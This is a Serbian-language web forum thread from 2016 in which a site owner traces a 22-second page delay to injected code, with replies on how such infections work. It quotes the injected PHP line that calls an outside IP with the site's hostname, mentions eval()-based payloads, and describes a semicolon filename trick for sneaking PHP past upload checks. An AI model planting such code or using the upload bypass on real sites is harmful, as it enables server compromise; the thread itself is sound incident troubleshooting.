[ anon70939 @ 09.12.2016. 11:39 ] @
[ anon70939 @ 09.12.2016. 11:39 ] @
[ dejanet @ 09.12.2016. 12:18 ] @
Da li je slican wait (22 sec), kada drugi put testiras ?
Pada mi na pamet, da je web app recycled, odnosno da nije ucitana jer se malo koristi, pa kada naletis prvi, onda server ucitava, inicijalizuje, kompajlira.... [ anon70939 @ 09.12.2016. 13:00 ] @
svi sajtovi skoro tacno 22 sekunde. I to traje vec 2 dana
[ anon115774 @ 10.12.2016. 12:00 ] @
Jel se to desava i sa drugih lokacija?
Daj ip adresu tog servera i adresu web aplikacije (ako ne zelis ovde baci na pp) pa da probam da testiram. Imam nekoliko ideja... [ anon70939 @ 16.12.2016. 09:47 ] @
Hvala Informer na pomoći:)
Ajd da napišem i ovde, možda nekog gugl navede na ovu stranicu pa pomogne. Problem je bio sto su nam nekako u index stranice ubacili sledeće Code: <?php file_get_contents("http://185.86.150.37/info.php?h=".urlencode($_SERVER["HTTP_HOST"])); ?> I to je zapucavalo tih 22 sec. [ jablan @ 16.12.2016. 21:39 ] @
[ anon70939 @ 16.12.2016. 22:49 ] @
Pored nekoliko php sajtova, odnosno index.php stranica, bilo je i nekoliko HTML stranica, kao recimo ta gde je bilo samo Hello. Samo sto u njima nije bila ova php komanda nego neka <script>, ne secam se tacno komande, ali takodje je bila ova IP adresa u tim script tagovima.
Je l' ti to nije jasno, ili...? [ whitie2004 @ 17.12.2016. 09:58 ] @
Niste imali u konzoli brouzera ono:
Code: ... [function.file-get-contents]: failed to open stream: Connection timed out in ... [ Aleksandar Đokić @ 17.12.2016. 16:50 ] @
Obicno sa injektovani file-get-contents skinu payload za malware skriptu, i obicno je enkriptovan i sadrzi eval() koji pokrece izvrsavanje.
[ anon70939 @ 17.12.2016. 23:29 ] @
Nismo imali ništa u konzoli, valjda. Cimao sam kolegu da proveri što je sporo, gledao je u konzoli ali nije našao. Imao je samo taj wait time od 22sec kao što pingdom pokazuje.
Vratili smo nazad backup, pošto su to uglavnom sajtovi koji se retko azuriraju. Skeniracu da vidim da li u nekom fajlu postoji eval() Ali mene više brine kako je injectovano to u fajlove... Neverovatno mi je da je neko skontao šifru, jer svuda gde stavljam šifre, različite su i koristim http://passwordsgenerator.net/. 16 kojekakvih karaktera... Iscimao sam ga za fail2ban da postavi, rekao mi je da je bio instaliran ali da nije primetio da ne radi. I dodao je za magento site jail, ili podesio regex kako on kaze, sta god da je to. Nakon toga poslao mi ovu poruku koju baš i ne razumem Citat: The test works fine: Date template hits: 0 hit(s): MONTH Day Hour:Minute:Second 0 hit(s): WEEKDAY MONTH Day Hour:Minute:Second Year 0 hit(s): WEEKDAY MONTH Day Hour:Minute:Second 0 hit(s): Year/Month/Day Hour:Minute:Second 0 hit(s): Day/Month/Year Hour:Minute:Second 0 hit(s): Day/Month/Year Hour:Minute:Second 145315 hit(s): Day/MONTH/Year:Hour:Minute:Second 0 hit(s): Month/Day/Year:Hour:Minute:Second 0 hit(s): Year-Month-Day Hour:Minute:Second 0 hit(s): Day-MONTH-Year Hour:Minute:Second[.Millisecond] 0 hit(s): Day-Month-Year Hour:Minute:Second 0 hit(s): TAI64N 0 hit(s): Epoch 0 hit(s): ISO 8601 0 hit(s): Hour:Minute:Second 0 hit(s): <Month/Day/Year@Hour:Minute:Second> Success, the total number of match is 967 However, look at the above section 'Running tests' which could contain important information. [ Aleksandar Đokić @ 18.12.2016. 20:56 ] @
Citat: kako je injectovano to u fajlove Preko rupa u CMS-u. Na primer imas na sajtu opciju za upload nekih slika, i umesto slike uploaduju .php kod tako sto zaobidju provere u skipti. Ako se dobro secam jedan od nacina je stavis naziv fajla koji sadrzi php kod slika.php;.jpg, i kad skripta proverava vidi da je .jpg i dozvoli upload, a kad Linux snima fajl obrise sve do ';' i snimi kao slika.php, i onda to mozes da pokrenes kao bilo koji drugi php kod. Ovo je samo jedan primer. Svaki dan nadju nesto novo - zato i radimo update, ne? Copyright (C) 2001-2025 by www.elitesecurity.org. All rights reserved.
|